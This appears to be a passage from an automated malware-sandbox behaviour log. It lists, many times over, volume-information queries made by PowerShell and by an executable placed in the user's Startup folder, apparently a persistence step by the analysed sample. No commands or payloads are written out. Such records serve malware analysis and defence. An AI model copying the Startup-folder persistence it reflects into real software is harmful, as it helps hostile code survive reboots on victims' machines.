                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
